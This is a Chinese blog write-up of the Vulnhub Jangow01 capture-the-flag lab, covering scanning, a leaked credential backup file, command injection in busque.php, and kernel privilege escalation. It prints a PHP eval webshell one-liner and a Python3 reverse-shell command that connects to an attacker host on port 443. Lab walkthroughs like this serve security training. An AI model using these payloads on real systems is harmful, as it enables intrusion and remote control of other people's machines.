首页 > 其他分享 >Vulnhub内网渗透Jangow01靶场通关

Vulnhub内网渗透Jangow01靶场通关

时间:2024-03-08 17:03:02浏览次数:35  
标签:Jangow01 shell 端口 192.168 168.15 Vulnhub pty 靶场 内网

详细请见个人博客


靶场下载地址
下载下来后是 .vmdk 格式,vm直接导入。 M1请使用UTM进行搭建,教程见此。该靶场可能出现网络问题,解决方案见此


信息搜集

arp-scan -l		# 主机发现ip为 192.168.168.15
nmap -sV -A -p- 192.168.168.15	# 端口扫描

Pasted Graphic

发现开放了21ftp80http端口,对80端口进行进一步目录扫描

dirsearch -u 192.168.168.15

Pasted Graphic 1

扫描到了一个.backup文件,访问预览一下

$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);

可以看到这是一个php的配置文件,包含servernamedatabaseusernamepassword,但是这里是localhost,数据库端口并没有对外开放,所以暂时无法利用。

再访问一下/site站点,首页上的Buscar非常可疑,访问后是如下网址:

192.168.168.15/site/busque.php?buscar=

image-20240308161126370

经过测试之后可以命令执行

Pasted Graphic 3

其他信息搜集的差不多了,这里可能会是一个突破口


测试过程

上面扫描出来了ftp服务,尝试使用.backup进行连接

Connected to 192.168.168.15.

连接成功了,也看到了当前站点的文件目录,但是经过测试没有put权限,没有办法上传文件。

站点的命令执行第一个想到的是直接反弹shell,但是经过测试发现似乎无法执行bash和nc等命令

后来发现可以直接使用python3反弹shell

Pasted Graphic 6

为了更好操作,尝试使用echo写入一句话木马,然后使用蚁剑连接

192.168.168.15/site/busque.php?echo '<?php phpinfo();eval($_REQUEST["x"]);?>' > shell.php

Pasted Graphic 5

webshell 虽然赋予我执行命令、管理文件的能力,但毕竟不是真正的 shell,无法执行交互式命令、无法控制进程状态、无法补全命令等等,非常不利于提权操作以及横向移动,所以,必须反弹 shell以执行更多的操作。

尝试了几乎所有的反弹shell命令,都无法成功监听到,后来想到有可能是出站策略中限制了端口。参考这篇文章,尝试了443端口,成功反弹shell。这里需要注意,该靶场没有python命令,而是python3

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.168.5",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'

Pasted Graphic 8

wordpress

成功反弹到shell后,建立一个交互式终端

python3 -c 'import pty;pty.spawn("/bin/bash");'

由于用户是www-data,也没有开放ssh和mysql权限,之前看到的jangow01账户也没有用。查一下系统内核

uname -a

看到内核是Linux 4.4.0-31,这个内核已经很老了,存在漏洞

searchsploit Ubuntu 4.4.0-31

Pasted Graphic 10

尝试了43418.c44298.c,都无法成功提权

Pasted Graphic 9

后来尝试到45010.c,成功提权了

Pasted Graphic 11

Pasted Graphic 12


总结

这个靶场整体来说都比较常规,除了反弹shell有些困难,需要学习一些知识

标签:Jangow01,shell,端口,192.168,168.15,Vulnhub,pty,靶场,内网
From: https://www.cnblogs.com/xzajyjs/p/18061382

相关文章

  • vulnhub靶机:dc4
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机的ip10.9.23.522:端口扫描nmap-A-p--T410.9.23.523:端口探测二:渗透测试1:密码爆破尝试九头蛇进行爆破构建语句:hydra-ladmin-Ppass.txt10.9.23.52http-post-form"/login.php:us......
  • 内网穿透搭建
    内网穿透搭建参考文章https://github.com/frank-lam/lanproxy-nat官网地址https://github.com/ffay/lanproxy/blob/master/README.md1、环境准备基于lanproxy搭建https://github.com/ffay/lanproxy1、一台具有公网ip的服务器,使用docker安装服务,注意端口开放......
  • 内网穿透搭建
    内网穿透搭建参考文章https://github.com/frank-lam/lanproxy-nat官网地址https://github.com/ffay/lanproxy/blob/master/README.md1、环境准备基于lanproxy搭建https://github.com/ffay/lanproxy1、一台具有公网ip的服务器,使用docker安装服务,注意端口开放......
  • vulnhub靶机:dc3
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机的ip10.4.9.23.2432:端口扫描nmap-A-p--T410.9.23.2433:端口探测提示要获取root权限4:目录遍历查看Wapplayzer信息:使用的Joomla系统,所以使用joomscan(Joomla漏洞扫描器)扫描器扫描:joom......
  • Sliver C2通关渗透攻击红队内网域靶场2.0
    准备2012server第一台机器开机后,要在C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain​手动运行下startWebLogic.cmd​,但是我访问7001遇到了报错:​​是路径配置错误,但是没搜到什么解决方法,全踏马互相抄互相抄。去问chatgpt,给出的解释是去访问http://12......
  • Sliver C2通关渗透攻击红队内网域靶场2.0
    准备2012server第一台机器开机后,要在C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain​手动运行下startWebLogic.cmd​,但是我访问7001遇到了报错:​​是路径配置错误,但是没搜到什么解决方法,全踏马互相抄互相抄。去问chatgpt,给出的解释是去访问http://12......
  • Sliver C2通关渗透攻击红队内网域靶场2.0
    准备2012server第一台机器开机后,要在C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain​手动运行下startWebLogic.cmd​,但是我访问7001遇到了报错:​​是路径配置错误,但是没搜到什么解决方法,全踏马互相抄互相抄。去问chatgpt,给出的解释是去访问http://12......
  • 内网渗透基础
    工作组工作组是计算机最简单的资源管理模式。默认情况下,计算机采用工作组模式进行资源管理,且都处于在名为WORKGROUP的工作组中,在命令提示符执行systeminfo命令,如果输出结果中的"域"信息部分显示为WORKGROUP,则证明当前主机处于工作组而非某个域中。由于工作组是一种松散的资源管......
  • vulnhub靶机:driftingblues7
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip:10.9.23.112靶机ip:10.9.23.932:端口扫描nmap-A-p--T410.9.23.93开放了22,66,80,443,3306端口3:端口探测访问66端口,因为是上面运行了SimpleHttpServer访问80端口,发现一个登录界面,来百度搜索Eyesofnetwork发......
  • FRP内网穿透
    Frp最新.toml配置文件1.FRP主要由两部分组成:FRPC客户端(frpclient)运行在公司内网机器上接收来自公网的访问请求将请求转发给内网服务FRPS服务端(frpserver)部署在具有公网IP的机器上暴露服务的公网入口接收公网访问请求通过加密隧道转发到FRPC2.准备工作一......